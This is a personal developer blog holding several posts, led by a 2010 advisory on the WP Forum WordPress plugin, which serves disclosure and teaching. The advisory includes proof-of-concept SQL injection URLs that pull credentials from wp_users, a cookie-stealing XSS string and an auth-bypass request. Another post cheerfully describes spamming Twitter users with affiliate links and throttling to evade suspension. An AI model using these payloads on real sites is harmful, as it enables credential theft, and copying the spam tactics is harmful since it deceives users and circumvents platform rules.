Charles Hooper

Thoughts and projects from a site reliability engineer

Multiple Vulnerabilities in WP Forum (WordPress Plugin)

1. Advisory Information

Title: Multiple Vulnerabilities in WP-Forum
Advisory URL: http://www.charleshooper.net/blog/multiple-vulnerabilities-in-wp-forum-wordpress-plugin/
Date Published: 12/17/2010
Vendors Contacted: WordPress. Maintainer of plugin is unreachable.

2. Summary

WP Forum is a plugin for the popular blog tool and publishing platform, WordPress.
The author of WP Forum describes it as a “Simple discussion forum plugin” and
“easy to use and administer.”

There exist multiple vulnerabilities in WP Forum. Input validation is not
performed at all, resulting in SQL injection, stored XSS, and reflected XSS
vulnerabilities.

Furthermore, the author wrote the plugin under the assumption that it would only be
executed within the context of the WordPress administrative panel, thereby neglecting
to perform proper authentication and authorization.

3. Vulnerability Information

Packages/Versions Affected: Probably all, but confirmed only on WP Forum 1.7.8

3a. Type:   SQL Injection [CWE-89]
3a. Impact: Read application data, bypass protection mechanisms,
modify application data. There are multiple SQL injections present
in WP Forum, the most prominent of which is in the `group_login`
functionality. Prior to logging in, an attacker can retrieve each
group’s password due to the vulnerability listed below (3b).

3b. Type:   Plaintext Storage of a Password [CWE-256]
3b. Impact: Password is easily retrieved from database

3c. Type:   XSS (Stored or Reflected) [CWE-79]
3c. Impact: Execute unauthorized code or commands

3d. Type:   Auth Bypass via Direct Request [CWE-425]
3d. Impact: Many or all of the administrative functions assume they are running
in the context of the WordPress administrative section. As a result,
they often do not check that the user is authenticated or authorized
to perform a particular action. Example functionality includes adding
or removing forum moderators and deleting forums. This vulnerability
could lead to information exposure, privilege escalation, or data loss.

3e. Type:   Information Exposure Through Sent Data [CWE-201]
3e. Impact: `sendmail.php` discloses users’ email addresses by accepting a user-
provided “user” variable and returning a hidden tag containing
that user’s email address.

3f. Type:   External Control of Assumed-Immutable Web Parameter [CWE-472]
3f. Impact: `sendmail.php` accepts user-provided input, allowing it to be used as
an email relay.

4. PoC & Technical Description

Due to the number of vulnerabilities in this package, I will not discuss each one
individually. Instead, here are some sample PoCs. Many more exploitable
vulnerabilities exist in this package than what I am providing here.

4a. http://path.to/wordpress/?page_id=&forumaction=group_login&group_id=0 UNION SELECT CONCAT_WS(CHAR(58),user_login,user_pass,user_email) FROM wp_users LIMIT 1 #
or (this applies to all PoCs): http://path.to/wordpress/?forumaction=group_login&group_id=0 UNION SELECT CONCAT_WS(CHAR(58),user_login,user_pass,user_email) FROM wp_users LIMIT 1 #
4b. N/A
4c. http://path.to/wordpress/?forumaction=group_login&group_id=alert(document.cookie);
4d. http://path.to/wordpress/wp-content/plugins/wpforum/wp-forum-manage.php?editgroupsubmit=true&group=&groupname=&passwd=
4e. http://path.to/wordpress/wp-content/plugins/wpforum/sendmail.php?user= (email address will be in HTML source)
4f. POST `submit=true&sender=&email=&message=&subject=&replyto=`
to http://path.to/wordpress/wp-content/plugins/wpforum/sendmail.php (untested)
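To illustrate the class of bug behind PoC 4a (this is not WP Forum’s actual code, and SQLite stands in for WordPress’ MySQL), here is a minimal sketch of how an unsanitized `group_id` lets a UNION pull data from `wp_users`, and how a bound parameter prevents it:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE groups (group_id INTEGER, passwd TEXT);
    CREATE TABLE wp_users (user_login TEXT, user_pass TEXT);
    INSERT INTO groups VALUES (1, 'group-secret');
    INSERT INTO wp_users VALUES ('admin', 'hash123');
""")

# The group_id "value" from PoC 4a: a UNION that reads wp_users instead
group_id = "0 UNION SELECT user_pass FROM wp_users --"

# Vulnerable pattern: attacker input interpolated straight into the SQL text
leaked = conn.execute(
    f"SELECT passwd FROM groups WHERE group_id = {group_id}"
).fetchone()

# Fixed pattern: a bound parameter is treated as data, never as SQL
safe = conn.execute(
    "SELECT passwd FROM groups WHERE group_id = ?", (group_id,)
).fetchone()

print(leaked, safe)  # ('hash123',) None
```

The interpolated version hands the attacker a password hash; the parameterized version matches no group at all.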

5. Report Timeline

12/10/2010 Initial email sent to WordPress security.
12/10/2010 Maintainer not yet contacted as project appears abandoned and maintainer
does not have listed contact information.
12/17/2010 No reply from WordPress security. Advisory released.

6. References

6a. The WordPress Plugin page for WP Forum:

http://wordpress.org/extend/plugins/wpforum/

6b. The WordPress Profile page for the author of the plugin:

http://profiles.wordpress.org/users/fahlstad/

6c. The plugin author’s website:

http://www.fahlstad.se/

7. Legalese

This vulnerability report by Charles Hooper < chooper@plumata.com > is
licensed under a Creative Commons Attribution-NonCommercial-ShareAlike
3.0 Unported License.

8. Signature

Public Key: Obtainable via pool.sks-keyservers.net

Cost Behavior Analysis Calculator

One of the projects I’ve been working on lately is my Cost Behavior Analysis Calculator.

Cost behavior analysis is the process of dividing a mixed cost into its variable and fixed components. Doing this can be a long and tedious process. This process, when done manually, involves:

  1. Determining which metric or activity drives costs. A common example in manufacturing is “machine hours.” Using this technique, you could determine how much each “machine hour” affects your power bill.
  2. Making a scatter graph of your data. When you’re plotting your data, what you’re looking for is that a linear relationship exists between your cost driver and your costs. If a linear relationship doesn’t exist, then it isn’t a cost driver – pick a new metric and try again.
  3. Fitting a line to the scatter graph. When working on paper, it’s easier to use the high-low method. However, this method is considered inaccurate as it only uses two points from your entire data set. Not to mention, the highest and lowest points of these data sets are usually considered “atypical.” The Cost Behavior Analyzer uses least-squares regression to fit a more accurate line.
  4. Measuring your slope and y-intercept. The slope of the line is your variable cost (per unit of activity) and the y-intercept is your fixed cost.
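Steps 3 and 4 above can be sketched with ordinary least squares; the machine-hour and cost figures below are made up for illustration:

```python
# Fit cost = fixed + variable * activity by least-squares regression.
def fit_mixed_cost(hours, costs):
    n = len(hours)
    mean_x = sum(hours) / n
    mean_y = sum(costs) / n
    sxx = sum((x - mean_x) ** 2 for x in hours)
    sxy = sum((x - mean_x) * (y - mean_y) for x, y in zip(hours, costs))
    variable = sxy / sxx                 # slope: cost per machine hour
    fixed = mean_y - variable * mean_x   # y-intercept: fixed cost
    return fixed, variable

hours = [100, 150, 200, 250, 300]          # hypothetical machine hours
costs = [1200, 1450, 1700, 1950, 2200]     # hypothetical power bills
fixed, variable = fit_mixed_cost(hours, costs)
print(round(fixed, 2), round(variable, 2))  # 700.0 5.0
```

In this (perfectly linear) toy data, each machine hour drives $5 of cost on top of a $700 fixed cost.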

I developed the Cost Behavior Analyzer because I found that doing this work manually was tedious and repetitive. I’m making it available here so others can benefit from its use. Managerial accountants, financiers, business owners, and entrepreneurs alike should all know what’s driving their costs and how to accurately predict them.

Try the Cost Behavior Analyzer out now!

Twitter vs Erotica: Your Corpora’s Source Matters

Dictionary © uair01; some rights reserved.

As a result of my now defunct project, BookSuggest, I’ve built a fairly large corpus that has been seeded entirely from Twitter. This corpus weighs in at:

  • 16,680,000 documents (tweets)
  • 1,970,165 unique (stemmed) words
    (Red flag: the Oxford Dictionary suggests there are an estimated 250,000 words in the English language. This discrepancy is the result of my failure to filter tweets based on language, the fact that usernames were included in the count, and the fact that people “make words up.” Also, “haha” becomes one word while “hahahaha” becomes another.)
  • 83,758,872 words total.

When I look at these numbers, I often think about how the source documents a corpus/histogram is derived from affects the distribution of its term frequencies. The most obvious example is language. A French corpus will never come close to an English corpus. A less obvious example is subject matter. For example, a corpus derived from English literature will have a different term distribution than a corpus derived from an English medical journal. Common terms will have similar frequencies, but there will be biases towards terms that are domain-specific.

To demonstrate, I scraped the “Erotica” section of textfiles.com and built a corpus based on the data there. The resulting corpus is composed of:

  • 4,337 documents
  • 50,709 unique (stemmed) words
  • 10,413,715 words total.

Notes on Term Counting

  • Words that had a length of less than 4 characters were discarded
  • Words were then stemmed using the Porter Stemming algorithm
  • There may be some slight differences between how words were counted in both corpora, based on minor programming differences
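The counting rules above can be sketched as follows (stemming is stubbed out here; the real pipeline applied the Porter algorithm via a stemmer library):

```python
import re
from collections import Counter

def count_terms(documents, min_len=4):
    counts = Counter()
    for doc in documents:
        for word in re.findall(r"[a-z']+", doc.lower()):
            if len(word) < min_len:
                continue              # rule 1: discard words under 4 characters
            counts[word] += 1         # rule 2 (Porter stemming) would go here
    return counts

# Two invented "tweets" for illustration:
docs = ["Follow me and I will follow back", "I love this book"]
counts = count_terms(docs)
print(counts["follow"], counts["and"])  # 2 0
```

Short words like “and” never make it into the histogram, which is why every term in the top-20 lists below is at least four characters long.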

The Data

Finally, here are the term frequencies with the obvious domain-specific terms in bold:

Corpus Seeded from Twitter

![Counts of Top 20 Terms from Twitter Corpus][6]

  1. that (0.84%)
  2. just (0.70%)
  3. with (0.69%)
  4. thi (0.68%)
  5. have (0.65%)
  6. your (0.61%)
  7. like (0.56%)
  8. love (0.54%)
  9. follow (0.45%)
  10. what (0.44%)
  11. from (0.36%)
  12. haha (0.35%)
  13. good (0.34%)
  14. para (0.34%)
  15. will (0.32%)
  16. when (0.30%)
  17. know (0.30%)
  18. want (0.30%)
  19. about (0.30%)
  20. make (0.30%)

Corpus Seeded from Erotica

![Counts of Top 20 Terms from Erotica Corpus][7]

  1. that (1.83%)
  2. with (1.42%)
  3. into (0.76%)
  4. down (0.70%)
  5. then (0.66%)
  6. back (0.66%)
  7. from (0.65%)
  8. thi (0.65%)
  9. hand (0.64%)
  10. were (0.59%)
  11. look (0.58%)
  12. have (0.58%)
  13. cock (0.57%)
  14. like (0.57%)
  15. over (0.57%)
  16. thei (0.56%)
  17. your (0.56%)
  18. what (0.55%)
  19. said (0.55%)
  20. could (0.54%)

You’ll note that the Twitter corpus had a heavy bias towards the term “follow,” whereas the Erotica corpus shows an overwhelming use of the term “cock.” (Writers: use synonyms.)

[6]: http://chart.apis.google.com/chart?chxl=0: that just with thi have your like love follow what from haha good para will when know want about make&chxr=0,0,703297&chxt=x&chbh=a,4,10&chs=600x200&cht=bvg&chco=4D89F9&chds=0,703297&chd=t:703297,582988,581346,573197,547218,513823,467673,455264,378187,367112,302254,296974,286671,283887,272176,254419,252303,251673,251325,248572&chtt=Counts of Top 20 Terms from Twitter Corpus
[7]: http://chart.apis.google.com/chart?chxl=0: that with into down then back from thi hand were look have cock like over thei your what said could&chxr=0,0,190543&chxt=x&chbh=a,4,10&chs=600x200&cht=bvg&chco=F889F9&chds=0,190543&chd=t:190543,148204,78688,72452,69045,68642,68164,67998,66826,61787,60236,60179,59622,59357,58856,58760,57851,57670,57348,55739&chtt=Counts of Top 20 Terms from Erotica Corpus

Practical Reasons Why This Is Important

This is important because if I were to build a domain-specific search engine, I would be better off seeding my corpus from domain-specific content. If I don’t, my relevance (tf-idf) scores will be inaccurate. For example, an Erotica-specific search engine should decrease the weight of the term “cock” simply because it has a very high document frequency and is therefore less significant. Meanwhile, a Twitter-specific search engine should discount the weight of “follow.”
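The inverse-document-frequency side of that effect is easy to see in miniature. Below, four hypothetical “documents” stand in for the erotica corpus; a term that appears in most of them gets a much lower idf (and so contributes less to relevance) than a rarer one:

```python
import math

def idf(term, docs):
    df = sum(1 for d in docs if term in d)          # document frequency
    return math.log(len(docs) / df) if df else 0.0  # rarer -> heavier weight

# Four invented documents, as sets of terms:
docs = [{"cock", "hand", "said"}, {"cock", "look"}, {"cock", "back"}, {"hand"}]
print(idf("cock", docs) < idf("hand", docs))  # True: the ubiquitous term weighs less
```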

Conclusion

To conclude, the subject matter of a document set will create a bias towards domain-specific terms in the document set’s histogram of term frequencies. If you are calculating relevance for any particular document set, you should use a corpus derived from that document set. In other words, if you can, try not to re-use your corpora!

WordPress Auto Upgrade and “Dumb” Permissions

One of the nice features about WordPress is its ability to upgrade and install plugins on the fly. This is nice because now you don’t need to be bothered with the hassle of downloading plugins, unzipping their contents, and transferring them to your web server.

Unfortunately, the way in which WordPress determines whether it has the appropriate permissions to upgrade plugins is implemented poorly. When WordPress doesn’t think it has permission, the admin panel will instead prompt you for FTP login information. This is a problem because WordPress will sometimes prompt for credentials even when it does have the proper permissions.

The Problem

The way WordPress tries to guess whether it has proper permissions is very primitive. Instead of using PHP’s is_writable, WordPress compares the web server’s User ID with the User ID of the wp-content directory’s owner*. While this might work for a large number of cases, it doesn’t work in all of them (including mine).

* It’s actually slightly more complicated than this, but the effect is the same.
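The contrast can be sketched in Python on a POSIX system (WordPress’ actual check lives in PHP in wp-admin/includes/file.php; this is only an illustration of ownership-versus-writability):

```python
import os
import tempfile

def owner_matches(path):
    # roughly the WordPress-style check: does our UID own the directory?
    return os.stat(path).st_uid == os.getuid()

def is_writable(path):
    # the alternative: ask the OS whether writes are actually permitted
    return os.access(path, os.W_OK)

# A directory can be writable (e.g. via group permissions) while failing the
# ownership test; for a directory we just created, both checks pass.
path = tempfile.mkdtemp()
print(owner_matches(path), is_writable(path))  # True True
```

A group-writable wp-content owned by another user passes the second check but fails the first, which is exactly the situation described below.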

The Environment

I run WordPress 3.x on Ubuntu 10.04 LTS under Lighttpd and PHP5-cgi. Lighttpd runs as user www-data and group www-data. If I wanted to let WordPress’ auto-detection of permissions work, I would have to change the owner of my website directories to www-data. This doesn’t fly with me, because I also want my user to have easy access to my document root and don’t like the idea of my data being user-owned by my webserver user.

The Solution

Instead of bending to WordPress’ permission issues, I was able to perform the following simple steps to get auto-installing/updating plugins and themes *without* changing user ownership of my web files.

  1. sudo chgrp -R www-data /path/to/wp/wp-content

    This changes group ownership of wp-content and all sub-directories to be group-owned by your webserver user. wp-content is where WordPress stores plugins, themes, cache files, and (AFAIK) file uploads.

  2. sudo chmod -R g+w /path/to/wp/wp-content

    This makes wp-content and all of its sub-directories group-writable.

  3. sudo chmod g+s /path/to/wp/wp-content

    This, g+s, is known as setgid. It causes files created inside wp-content to inherit the directory’s owning group, in this case www-data.

  4. Finally, add the following to the bottom of wp-config.php. This is an override built into the WordPress code. For more information, take a look at wp-admin/includes/file.php’s function get_filesystem_method.

Enable direct file updating in wp-config.php

/* Force direct file updating
- http://www.charleshooper.net/blog/wordpress-auto-upgrade-and-dumb-permissions/
*/
define('FS_METHOD', 'direct');

So there you have it. WordPress does a poor job of properly detecting file permissions and, in some cases, needs to be overridden. If you’re still having problems after this, let me know and I will do my best to help you.

RIP BookSuggest

BookSuggest, the web-based book recommendation engine, is officially dead. I’ve been treating BookSuggest as the lowest of priorities for quite some time now and I’m more than happy to declare this project a failure. Here is a brief recap of BookSuggest’s history.

Before BookSuggest was a web application, I used to spam unsuspecting Twitter users with book recommendations. Eventually, Twitter stepped up their anti-spam stance and suspended my spam account. I retired the project for a while until one day I decided to build a web application around the recommendation technology I was using.

This technology was simply scoring words in a user’s timeline, taking the four highest-scoring words, and then passing them to an Amazon ItemSearch query. More specifically, the type of search in use was what Amazon calls a TextStream search. This search method is what allowed me to get book recommendations even when the search terms provided weren’t all that great. Without it, many of my ItemSearches likely wouldn’t have returned any results at all.

So imagine my surprise when I read the following in Amazon’s API documentation:

Due to low usage, the Product Advertising API operations and response groups listed below will not be supported after October 15, 2010:


Additionally, due to low usage, we will be discontinuing Multiple Operation Requests and the TextStream search parameter.

Oh, shoot!

Financially, it makes sense for me to cut my losses here. Back when I was still spamming Twitter, I was pulling over $100/mo. Through the web-app, my referral fees are much smaller. As of this moment, I have a balance of just $9 with Amazon and haven’t cashed out since the start of the project.

Some numbers:

  • Unique Twitter users: 393
  • Recommendations made: 611
  • Documents in corpus: 17,458,549
  • Unique words in corpus: 1,970,165
  • Top 5 words in corpus: that, just, with, this, have

RIP BookSuggest!

Code Responsibly: What’s Best for Your Clients?

We programmers have a natural affinity for writing and using our own code. You can’t really blame us; this is akin to gardeners who prefer to eat vegetables they grow, or brewers who prefer to drink their own beer. However, this often leads to re-inventing the wheel. While that isn’t always a bad thing, it doesn’t usually benefit our clients, and here’s why:

  1. **Increased development time.** If a client is paying you hourly, why should they pay for you to re-invent a solution that already exists? Why write a new CMS if WordPress will do? When you write a new CMS from scratch for a client, you are increasing their development costs.
  2. **Freedom in hosting.** It’s no coincidence that many web developers also host their projects. This is fine for larger applications, but for the majority of client work out there, your clients should have the freedom to choose from a broad range of hosting options. Vendor lock-in is a terrible thing.
  3. **Post-development support.** If a client needs customizations made to the code base, they should be able to solicit the work from almost any developer. Certainly you would want preference in these solicitations, but no client should be stuck with you. When you use your own custom solution, you are increasing your clients’ maintenance costs.

I’m not saying that you shouldn’t ever write new code. What I am saying is that your responsibility to the client is to use the best tools for the job and to put together the best solution for them that you can. Sometimes this means flexing your coding muscles and sometimes this means humbly setting up existing software such as WordPress. So please, write new code conservatively and responsibly.

Validating Data With New-Style Classes in Python

Every once in a while in my reading I come across a minor reference to what Pythonistas refer to as new-style classes. One of the nice things about new-style classes is the `property` decorator. Property decorators allow you to build getter and setter methods to access object attributes. This is pretty awesome because you can now perform validation at the model/class level whenever you assign a value to a property of an object.

For example, in one of my projects I have an attribute named timestamp that takes a `datetime` object. I was concerned about receiving incorrect types from my input because there are a lot of ways a programmer can represent the concept of time. Some realistic possibilities of invalid types in my case are:

  • `time` objects from the time module
  • `string` objects that contain the date and time (and various possible formats)
  • `float` or `int` objects that contain a unix timestamp

With a setter method, you can test that the new value being assigned to an attribute is the correct type before assigning it. You can also throw an exception if it’s not. In other words, you can do something like this:

from datetime import datetime

class SomeObject(object):    # new-style classes must be subclassed from object
    _timestamp = None

    @property
    def timestamp(self):
        return self._timestamp

    @timestamp.setter    # the prefix must match the read-only getter func name
    def timestamp(self, value):    # the func name must match the read-only getter func name
        if not isinstance(value, datetime):
            raise ValueError("Timestamp can only be an instance of datetime")
        self._timestamp = value

Go ahead and try it!

The HN Effect in Numbers

For the unfamiliar, I wrote an article about a week and a half ago titled How I Made Money Spamming Twitter with Contextual Book Suggestions and promised that I would follow up with a post on the type of traffic I received. Not only did the article get to be pretty popular with the Hacker News crowd, get republished in Silicon Alley Insider, and make me the recipient of a handful of wonderful emails, but I even got to visit tracked.com’s engineering team and get schooled on machine learning techniques and A.I. (hi folks!)

Something relevant I should mention is that, just a day before, I had migrated my Posterous blog from one domain to its current place, blog.charleshooper.net. To anyone who’s curious, this was a totally painless process. Set up DNS first, update your Posterous settings, and set up 302 redirects so your links don’t break.

Social Link-Sharing
Despite finishing my article at 1:00 AM, I thought it was pretty well-written and I wanted my story to be heard, so I decided to get a full night’s sleep, proofread it in the morning, and submit the link to Reddit, Digg, and Hacker News. Besides the obvious benefit of proofreading the article while fully rested, I also recognized that most link-sharing sites weight votes based on time (or rather, some product of votes/time, maybe), so submitting my article in the morning meant that it would first show up at the beginning of what I believe to be peak usage.

So how’d I do? Reddit hated it.

Digg didn’t care.
And Hacker News loved it!
I also make use of Posterous’ “autopost” features and have all my new submissions get posted to Twitter and Facebook. According to Posterous, there were over 77 retweets of my article (most likely from the tweet storm that the Silicon Alley Insider bot and HN bots started) and 7 “likes” on Facebook.

Traffic
According to Google Analytics, I’m not very popular. Before publishing my article, I received an average of about 30 visits a day. On the day I published my article, I observed a surge of over 4,600 visitors. From there, the numbers declined daily at a rate that looks very much like exponential decay. It took 10 days for my traffic to return to normal, but that day was a Sunday and the following Monday was almost twice as high (62 visits). For the number geeks, the set of numbers beginning with the peak is (4652, 2688, 1065, 452, 206, 138, 105). I got close with the expression f(x) = 4652e^(-0.6x), but that isn’t quite right (maybe I should treat my average visits as a constant). Update: I’ve gotten much closer with f(x) = 2658e^(-0.94x) + 30.
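One way to fit a curve like that is ordinary least squares on the log of the visit counts, after subtracting the ~30-visit daily baseline as a constant. This is only a sketch using the numbers quoted above; it won’t land on exactly the coefficients in the post:

```python
import math

visits = [4652, 2688, 1065, 452, 206, 138, 105]  # daily visits from the peak
baseline = 30                                    # pre-spike average, held constant

# Fit visits(x) ~ A * exp(-k*x) + baseline via linear regression on
# log(visits - baseline).
xs = range(len(visits))
ys = [math.log(v - baseline) for v in visits]

n = len(visits)
mean_x = sum(xs) / n
mean_y = sum(ys) / n
slope = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, ys)) / \
        sum((x - mean_x) ** 2 for x in xs)
k = -slope                          # decay rate
A = math.exp(mean_y + k * mean_x)   # initial amplitude
print(round(A), round(k, 2))
```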

Over the time period, my article received over 9,000 unique page views with a bounce rate of over 90% (~93% exit rate.) I remember reading an article a little while ago that stated, on single-page use cases, the bounce rate will always be close to the exit rate unless the analytics software “phones in” after some period of time to register the visit as something other than a bounce. I use Google Analytics and, unless I find out otherwise, I don’t think it does this (although, it does measure “time on page” so maybe it does and Google’s idea of a bounce is different than mine.)


Sources

My largest source of traffic was referring websites, making up over 70% of it. Less than 2% was from search engines, and I don’t even think that any of it was destined for my article.

As for the referring websites, I received traffic from all over. However, most of it was from Hacker News, TechMeme.com, and Google.com. I looked into “google.com / referral” versus “google.com / organic” and the referrals mostly consisted of visitors using Google Reader. What isn’t shown below is the 113 other referring sites. The “daemonology.net” referral is a result of HN Daily. As you can see, my top sources are primarily seeded by social media and social link-sharing websites.

Conclusion

To conclude, don’t undervalue the social sites. If you want some organic link juice, then utilize the “chatty” sites like Facebook and Twitter as well as the link-sharing sites such as Hacker News, Reddit, and Digg. There is a hidden benefit to putting yourself out there and asking for a lot of attention: you will ensure that your articles, blog posts, and research are high-quality resources of useful information. Essentially, you end up treating each blog post as you would any startup. Experiment first. Create value second. The rest (profit, respect, esteem) comes easy.

How I Made Money Spamming Twitter With Contextual Book Suggestions

Two winters ago I left a position as a system administrator that was paying pretty well and moved cross-country to a region with fewer jobs than where I moved from. Three months later, I was still unemployed, broke, and bored. I was talking to my good friend Japhy on IRC one day and he was explaining to me how the tf-idf algorithm works. For reasons involving boredom more than anything else, I dreamed up an idea: I would write software that would take a given document and generate book suggestions based on its content.

I think that most programmers would agree with me that we put in longer hours on code when we’re not working for anybody. We don’t stop learning, either. To us, unemployment is a brief sprint of academia spent in our home office, the local coffee shop, or our parents’ house. My imagination dreamed up this fairly straightforward process:

  1. Take a given document and calculate tf-idf scores on all terms
  2. Select X number of the highest scoring terms
  3. Pass these high-scoring terms to an Amazon ItemSearch query
  4. Receive a list of recommended books (with URLs) from Amazon

I had already written multiple Twitter bots by this time so I decided to just use some of my existing code to poll Twitter’s search API. Essentially, the “documents” I mentioned above were actually tweets containing the terms “book” or “books.” Two and a half days later I had a working prototype that could generate a book recommendation from a given tweet. It was at this time that I added steps 5 and 6:

  5. Tag URLs returned from Amazon’s ItemSearch with an affiliate ID; and
  6. Reply to the tweeting user with their new book suggestion
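Steps 1 and 2 of the process above can be sketched as follows. The tiny background corpus and the sample tweet are invented for illustration (the real bot scored against a Twitter-seeded corpus), and short words are dropped as in my term-counting rules:

```python
import math
from collections import Counter

corpus_docs = [set(d.split()) for d in [
    "i love this book so much",
    "reading a great book today",
    "new phone who dis",
]]

def tfidf_top_terms(text, docs, limit=4):
    words = [w for w in text.lower().split() if len(w) >= 4]
    tf = Counter(words)
    scores = {}
    for w, f in tf.items():
        df = sum(1 for d in docs if w in d)
        idf = math.log(len(docs) / (1 + df))  # +1 smoothing avoids div-by-zero
        scores[w] = (f / len(words)) * idf
    return sorted(scores, key=scores.get, reverse=True)[:limit]

terms = tfidf_top_terms("looking for a good mystery book about detectives",
                        corpus_docs)
print(terms)
```

Note how “book” scores lowest here precisely because it appears throughout the background corpus; the rarer, more distinctive terms are what get handed to the ItemSearch query.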

Four months later and I had generated over $7,000 in sales for Amazon with over $400 in commission for myself. Obviously, the commission I was making wasn’t livable, but it was a nice addition to my then-depleting savings. Had I decided to scale out my operation, I could have made much more. My benchmark is at four months because that’s how long I went before being suspended. My conversion rate? 0.13%! While seemingly low, this number is very high when compared to email spam. However, it’s important to note that email spam is subject to various filtering technologies.

twitter-spam-earnings.png

A fair amount of the time I share this story, people are more impressed by the fact that I went 4 months before getting suspended. The truth is, I had a lot of throttling built into my spam bot. The factors I think are important to point out are:

  1. Twitter’s Terms of Service at that time basically only outlawed “unsolicited replies,” nothing that really addressed targeted spam.
  2. Twitter’s anti-spam stance did exist in writing (only on the help site), but I do not think they were actively enforcing their policies.
  3. My recommendations were contextual and, unless you looked at my bot’s timeline and tweet count, looked legitimate (most of the time). In other words, I was tweeting book suggestions to people who were already talking about books.
  4. I recorded the usernames of everyone I sent recommendations to and would only @mention them once.
  5. I built in a “chattiness” rate limiting function. This was to distribute my spam throughout a whole hour (due to Twitter’s rate limiting) more than anything.

twitter-suspended.png

While it only lasted a short while, I had a lot of fun and made a little bit of money spamming Twitter.

The second reincarnation of this project turned into BookSuggest, a website for recommending books based on a person’s Twitter feed. I haven’t put a lot of effort into promoting it, but my conversion rate is much lower now that I’m not pushing the links in anyone’s face.

Try it out and comment here – what did BookSuggest tell YOU to read?

What Are the Generally Accepted Accounting Principles (GAAP)?

This entry is part 3 of 8 in the series Intro to Financial Reporting

Previously, we discussed the various regulations and regulatory bodies that govern financial reporting. We will now turn to the Generally Accepted Accounting Principles (GAAP) to explain the basic principles used in accounting. In particular, we will discuss the cost, revenue recognition, matching, and full disclosure principles.

While it may sound redundant, the cost principle means that “accounting information is based on an actual cost” (Wild, Shaw, & Chiappetta, 2009, p. 9). In other words, everything is treated as having the value of what was paid for it. So what happens when businesses make a trade or don’t purchase with cash (businesses have been known to buy each other with a mix of cash, stocks, and bonds)? “If something besides cash is exchanged … cost is measured as the cash value of what is given up or received” (Wild, Shaw, & Chiappetta, 2009, p. 10). The caveat here is that if you buy something and get a good deal, such as buying a $7000 asset for $5000, the item will be recognized in your accounting system as having a value of $5000. This is to ensure that the accounting information remains objective (Wild, Shaw, & Chiappetta, 2009, p. 10). Next, we will look at the revenue recognition principle.

The revenue recognition principle determines how and when a company will recognize (record) revenue (Wild, Shaw, & Chiappetta, 2009, p. 10). The primary concept of the revenue recognition principle is that “Revenue is recognized when earned” (Wild, Shaw, & Chiappetta, 2009, p. 10). This doesn’t necessarily mean when the customer or client pays for their good or service, but when the good or service is actually sold (such as on credit). For example, if I configured someone’s network (a service) at an hourly rate, I would be required to recognize and record this earned revenue as soon as the work is done; this is usually done by debiting accounts receivable (most accounting software does this automatically when generating an invoice). This principle is intended to keep companies from recognizing revenue too early to look more profitable while also ensuring that they don’t recognize revenue too late to look less profitable than they really are (Wild, Shaw, & Chiappetta, 2009, p. 10). Now let’s look to the matching principle.

The matching principle dictates that a company must report its expenses in the period that they generated the revenue reported (Wild, Shaw, & Chiappetta, 2009, p. 10). Let’s say, for example, that a company buys 10 pounds of raw material, uses it to make 10 widgets, and then sells 5 of those widgets. Under the matching principle, the company would report the expenses (or, in this case, Cost of Goods Sold) incurred to make the 5 widgets it sold. The remaining 5 (that are now sitting in inventory), would not have their expenses/COGS reported until they too were sold. Finally, we turn to the full disclosure principle.
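The widget example works out like this (the material cost below is invented, since the post gives no dollar figure):

```python
# Matching principle: only the cost of the widgets sold is expensed now.
material_cost = 100.00            # hypothetical cost of the 10 lb of material
widgets_made = 10
widgets_sold = 5

cost_per_widget = material_cost / widgets_made
cogs_this_period = widgets_sold * cost_per_widget      # expensed this period
inventory_carried = material_cost - cogs_this_period   # expensed when sold
print(cogs_this_period, inventory_carried)  # 50.0 50.0
```

Half the material cost hits Cost of Goods Sold now; the other half sits in inventory until those widgets sell.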

The full disclosure principle is probably the most basic yet most important principle. The full disclosure principle states that a company must “report the details behind financial statements that would impact users’ decisions” (Wild, Shaw, & Chiappetta, 2009, p. 10). Oftentimes, these details are reported in footnotes of a company’s financial statements or annual reports (Wild, Shaw, & Chiappetta, 2009, p. 10). An example of this from current events is Dell’s recent trouble with the SEC. Dell’s recent trouble was partially the result of receiving money from CPU manufacturer Intel and disguising that money as sales (why they hid it is another topic entirely). Users of Dell’s financial reports were led to believe that this extra money was the result of sales. When Intel stopped paying Dell this “incentive money,” Dell then took extra steps to falsify their financial statements to hide the fact that their revenue decreased. Save for the anti-trust violation with Intel, if Dell had just fully disclosed the revenue it was receiving from Intel they may have never felt the pressure to hide the fact that the payments stopped.

In conclusion, the Generally Accepted Accounting Principles (GAAP) are made up of four basic principles. In particular, we discussed the cost, revenue recognition, matching, and full disclosure principles.

Wild, J., Shaw, K., & Chiappetta, B. (2009). Principles of Financial Accounting (19th ed.). McGraw-Hill/Irwin.